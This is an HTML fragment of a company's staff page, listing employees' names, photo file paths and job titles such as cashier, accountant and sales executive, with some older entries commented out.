        <!--    <p>Designation :  Senior Advisor </p>-->
     <div class="team-row">
         <div class="member">
            <img src="images/kavita.jpeg" alt="">
            <h2>Kavita Yangundi</h2>
            <p>Designation :  Cashier</p>
        <div class="member">
            <img src="images/Amarnath.jpeg" alt="">
             <h2>Amarnath Yaldandi</h2>
            <p>Designation : Accountant </p>
     <div class="team-row">
        <div class="member">
            <img src="images/Dhanraj Kolhapure Photo New.jfif" alt="">
            <h2>Dhanraj Kolhapure</h2>
            <p>Designation : Senior Sales Executive</p>
        <div class="member">
            <img src="images/Nayan.jpeg" alt="">
            <h2>Nayan Lakapati</h2>
            <p>Designation : Senior Sales Executive </p>
        <div class="member">
            <img src="images/Nitin.jpeg" alt="">
            <h2>Nitin Shirke</h2>
            <p>Designation : Senior Sales Executive </p>
        <div class="member">
            <img src="images/Sudhir Kumavat1.jpeg" alt="">
            <h2>Sudhir Kumavat</h2>
            <p>Designation :  Senior Sales Executive</p>
        <div class="member">
            <img src="images/Amit Adone Photo.jfif" alt="">
            <h2>Amit Adone</h2>
            <p>Designation :  Senior Sales Executive</p>
        <div class="member">
            <img src="images/Prakash Tamshetti.jpeg" alt="">
            <h2>Prakash Tamshetti</h2>
            <p>Designation :   Senior Sales Executive </p>
    <!-- <div class="team-row">-->
    <!--    <div class="member">-->
    <!--        <img src="images/Prakash Tamshetti.jpeg" alt="">-->
    <!--        <h2>Prakash Tamshetti</h2>-->
    <!--        <p>Designation :   Advisor </p>-->
    <!--    </div>-->
    <!--    <div class="member">-->
    <!--        <img src="images/Sudhir Kumavat.jpeg" alt="">-->
    <!--        <h2>Sudhir Kumavat</h2>-->
    <!--        <p>Designation :   Advisor</p>-->
    <!--    </div>-->
        <!--<div class="member">-->
        <!--    <img src="" alt="">-->
        <!--    <h2>Senior Advisor</h2>-->
        <!--    <p>Designation :   Advisor </p>-->
        <!--<div class="member">-->
        <!--    <img src="" alt="">-->
        <!--    <h2>Senior Advisor</h2>-->
        <!--    <p>Designation :   Advisor</p>-->
     <div class="team-row">
        <div class="member">
            <img src="images/Adhir Gonyal1.jpeg" alt="">
            <h2>Adhir Gonyal</h2>
            <p>Designation : Sales Executive</p>
        <div class="member">
            <img src="images/Vivek.jpeg" alt="">
            <h2>Vivek Mohan Kshirsagar</h2>
            <p>Designation : Sales Executive</p>
        <div class="member">
            <img src="images/Veerbhadra.jpeg" alt="">
            <h2>Veerbhadra Swami </h2>
            <p>Designation : Sales Executive</p>
         <div class="member">
            <img src="images/Akshay.jpeg" alt="images/Akshay.jpeg">
            <h2>Akshay Hiremath  </h2>
            <p>Designation : Sales Executive</p>
         <div class="member">
            <img src="images/Navin Yannam Photo.jfif" alt="">
            <h2>Navin Yannam</h2>
            <p>Designation : Sales Executive </p>
        <div class="member">
            <img src="images/Vinayak Indapure.jpeg" alt="">
            <h2>Vinayak Indapure</h2>
            <p>Designation : Sales Executive</p>
        <!--<div class="member">-->
        <!--    <img src="" alt="">-->
        <!--    <h2>Sales Executiv</h2>-->
        <!--    <p>Designation : Sales Executive </p>-->
    <div class="team-row">
        <div class="member">
            <img src="images/aditya.jpeg" alt="images/aditya.jpeg">
            <h2>Aditya Chilweri</h2>
            <p>Designation : Sales Executive</p>
        <div class="member">
            <img src="images/Chandan.jpeg" alt="">
            <h2>Chandan Maindargi</h2>
            <p>Designation : Sales Executive</p>
        <div class="member">
            <img src="images/Piyush.jpeg" alt="">
            <h2>Piyush Panche</h2>
            <p>Designation : Sales Executive</p>
        <div class="member">
            <img src="images/Prashant.jpeg" alt="">
            <h2>Prashanth Gaikwad</h2>
            <p>Designation : Sales Executive</p>
        <div class="member">
            <img src="images/Tejas.jpeg" alt="">
            <h2>Tejas Dede</h2>
            <p>Designation : Sales Executive</p>
        <!--<div class="member">-->
        <!--    <img src="images/Sandeep Santi Photo.jfif" alt="">-->
        <!--    <h2>Sandip Santi</h2>-->
        <!--    <p>Designation : Sales Executive</p>-->
        <!--<div class="member">-->
        <!--    <img src="images/Ajay Shinde Photo JPG.jpg" alt="">-->
        <!--    <h2>Ajay Shinde</h2>-->
        <!--    <p>Designation : Sales Executive </p>-->
        <!--     <div class="member">-->
        <!--    <img src="images/SANJANA MYAGERI.jpeg" alt="">-->
        <!--    <h2>Sanjana Myageri </h2>-->
        <!--    <p>Designation : Sales Executive </p>-->

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